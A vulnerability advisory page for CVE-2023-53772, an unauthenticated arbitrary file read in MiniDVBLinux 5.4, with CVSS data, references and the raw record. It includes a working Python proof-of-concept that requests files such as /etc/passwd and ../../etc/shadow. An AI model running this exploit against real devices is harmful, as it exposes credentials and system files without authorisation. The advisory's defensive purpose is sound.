Security Vulnerability Report
CVE-2023-53772 CVSS 7.5 HIGH

CVE-2023-53772

Published: 2025-12-09 21:15:52
Last Modified: 2025-12-19 19:20:24

Description

MiniDVBLinux 5.4 contains an arbitrary file disclosure vulnerability that allows attackers to read sensitive system files through the 'file' GET parameter. Attackers can exploit the about page by supplying file paths to disclose arbitrary file contents on the affected device.

CVSS Details

CVSS Score
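7.5 (CVSS 3.1 base score, the record's primary metric; the raw record below also carries a secondary CVSS 4.0 base score of 8.7)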
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:* - VULNERABLE
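MiniDVBLinux, all versions up to and including 5.4 (the CPE match in the raw record sets versionEndIncluding to 5.4)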

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53772: MiniDVBLinux arbitrary file read, proof of concept.
# Weakness: the about page takes a file path from its 'file' GET parameter
# (classified as CWE-22 in the CVE record). CVSS 3.1 base score: 7.5 (High).
#
# NOTE(review): the request path used below is reproduced as this page gives
# it; it has not been checked against the advisories the CVE record references.
#
# Detection: where request logging is available, an attempt shows up as an
# unauthenticated GET to the about page whose 'file' query parameter holds a
# filesystem path (absolute, or containing '../' sequences).
# Mitigation: the CVE record lists versions up to and including 5.4 as
# affected and this page names no fixed release, so keep the device's web
# interface unreachable from untrusted networks until a fix is confirmed.
import sys

import requests


def exploit_minidvblinux(target_url, file_path):
    """Request a file through the about page's 'file' parameter.

    The value of file_path is placed into the query string exactly as given
    (no URL-encoding), and the request carries no credentials.

    Args:
        target_url: Base URL of the MiniDVBLinux instance under test.
        file_path: Path of the file to request (absolute or relative).

    Returns:
        The response body when the server answers with HTTP 200, otherwise
        None (non-200 status, or a requests-level failure such as a timeout).
        A 200 status is the only success criterion; the body is not inspected.
    """
    request_url = f"{target_url}/about?file={file_path}"

    for status_line in (
        f"[*] Target: {target_url}",
        f"[*] Attempting to read: {file_path}",
        f"[*] Exploit URL: {request_url}",
    ):
        print(status_line)

    divider = "=" * 50
    try:
        # Plain GET with a 10-second timeout and no authentication.
        reply = requests.get(request_url, timeout=10)

        # Anything other than 200 is reported as a failure.
        if reply.status_code != 200:
            print(f"[-] Failed with status code: {reply.status_code}")
            return None

        print("[+] Success! File contents:")
        print(divider)
        body = reply.text
        print(body)
        print(divider)
        return body
    except requests.exceptions.RequestException as err:
        # Connection errors, timeouts and similar transport failures.
        print(f"[-] Error: {err}")
        return None


if __name__ == "__main__":
    # Two positional arguments are required; any further ones are ignored.
    if len(sys.argv) < 3:
        for usage_line in (
            "Usage: python cve-2023-53772.py <target_url> <file_path>",
            "Example: python cve-2023-53772.py http://192.168.1.100 /etc/passwd",
        ):
            print(usage_line)
        sys.exit(1)

    target, file_path = sys.argv[1], sys.argv[2]
    exploit_minidvblinux(target, file_path)

# File paths this page lists as examples of what the flaw discloses; the same
# strings are what to look for in the 'file' parameter when reviewing logs:
#   Password file:      /etc/passwd
#   Shadow file:        ../../etc/shadow
#   Application config: /etc/minidlna.conf
#   System log:         /var/log/syslog

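References

- https://www.exploit-db.com/exploits/51097 (Exploit, Third Party Advisory, VDB Entry)
- https://www.minidvblinux.de (Product)
- https://www.vulncheck.com/advisories/minidvblinux-arbitrary-file-read-vulnerability-via-about-page (Third Party Advisory)
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php (Exploit, Third Party Advisory)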

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53772", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:52.470", "lastModified": "2025-12-19T19:20:23.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniDVBLinux 5.4 contains an arbitrary file disclosure vulnerability that allows attackers to read sensitive system files through the 'file' GET parameter. Attackers can exploit the about page by supplying file paths to disclose arbitrary file contents on the affected device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.4", "matchCriteriaId": "2D9CAD03-85CC-41CC-B745-371250902E61"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51097", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.minidvblinux.de", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/minidvblinux-arbitrary-file-read-vulnerability-via-about-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}